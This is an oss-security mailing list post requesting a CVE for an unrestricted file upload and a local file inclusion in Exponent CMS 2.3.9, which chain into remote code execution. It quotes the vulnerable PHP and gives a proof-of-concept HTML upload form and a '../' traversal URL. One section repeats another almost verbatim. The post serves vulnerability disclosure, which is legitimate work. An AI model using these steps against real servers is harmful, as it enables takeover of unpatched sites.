Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 21 Sep 2016 10:08:21 +0800
From: "DM_" <contact@...ay.me>
To: "oss-security" <oss-security@...ts.openwall.com>
Subject: CVE request:Exponent CMS 2.3.9 Unrestricted File Upload RCE and Local File include vulnerability

Hi,


This is YongXiao Ma of Silence's PKAV Team. I reported some security issues to ExponentCMS some days ago. 


# Test environment
exponent version: latest 2.3.9
php: 5.5.x
server: apache 2.2.x


# Details


1. Unrestricted File Upload
there is a unrestricted file upload issue at framework/modules/forms/controllers/formsController.php and the upload file is located at /tmp/, where php script can be executed.


although we dont know file name, but we can brute it simply, such as time() + "_" + upload name.


    public function import_csv_mapper() {
        //Check to make sure the user filled out the required input.
        if (!is_numeric($this->params["rowstart"])) {
            unset($this->params["rowstart"]);
            $this->params['_formError'] = gt('The starting row must be a number.');
            expSession::set("last_POST", $this->params);
            header("Location: " . $_SERVER['HTTP_REFERER']);
            exit('Redirecting...');
        }


        if (!empty($this->params['forms_id'])) {
            // if we are importing to an existing form, jump to that step
            $this->import_csv_data_mapper();
        } else {
            //Get the temp directory to put the uploaded file
            $directory = "tmp";


            //Get the file save it to the temp directory
            if ($_FILES["upload"]["error"] == UPLOAD_ERR_OK) {
                //	$file = file::update("upload",$directory,null,time()."_".$_FILES['upload']['name']);
                $file = expFile::fileUpload("upload", false, false, time() . "_" . $_FILES['upload']['name'], $directory.'/'); //FIXME quick hack to remove file model
	....


POC: 


	<!DOCTYPE html>
	<html>
	<form action="http://localhost/exponent-2.3.9/index.php?controller=forms&action=import_csv_mapper&forms_id=1&rowstart=0" method="POST" enctype ="multipart/form-data">
	<input type="file" name="upload">	
	<input type="submit" name="submit">


	</form>
	</html>


2. LFI


then LFI comes, at exponent-2.3.9/install/popup.php.


    <?php
    $page = (isset($_REQUEST['page']) ? expString::sanitize($_REQUEST['page']) : '');
    if (is_readable('popups/' . $page . '.php')) {
        include('popups/' . $page . '.php');
    }
    ?>


so we can upload a php file, then include it to make a RCE again.


POC: 
	http://127.0.0.1/exponent-2.3.9/install/popup.php?page=../../files/test




3. Unrestricted File Upload and RCE


there is a unrestricted file upload issue at framework/modules/forms/controllers/formsController.php and the upload file is located at /tmp/, where php script can be executed.


although we dont know file name, but we can brute it simply, such as time() + "_" + name.


    public function import_csv_mapper() {
        //Check to make sure the user filled out the required input.
        if (!is_numeric($this->params["rowstart"])) {
            unset($this->params["rowstart"]);
            $this->params['_formError'] = gt('The starting row must be a number.');
            expSession::set("last_POST", $this->params);
            header("Location: " . $_SERVER['HTTP_REFERER']);
            exit('Redirecting...');
        }


        if (!empty($this->params['forms_id'])) {
            // if we are importing to an existing form, jump to that step
            $this->import_csv_data_mapper();
        } else {
            //Get the temp directory to put the uploaded file
            $directory = "tmp";


            //Get the file save it to the temp directory
            if ($_FILES["upload"]["error"] == UPLOAD_ERR_OK) {
                //	$file = file::update("upload",$directory,null,time()."_".$_FILES['upload']['name']);
                $file = expFile::fileUpload("upload", false, false, time() . "_" . $_FILES['upload']['name'], $directory.'/'); //FIXME quick hack to remove file model
	....


POC: 


	<!DOCTYPE html>
	<html>
	<form action="http://localhost/exponent-2.3.9/index.php?controller=forms&action=import_csv_mapper&forms_id=1&rowstart=0" method="POST" enctype ="multipart/form-data">
	<input type="file" name="upload">	
	<input type="submit" name="submit">


	</form>
	</html>






# Patches


https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a
https://exponentcms.lighthouseapp.com/projects/61783/changesets/628ea61834d92611644a1dfc1ba24216ee647c59

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ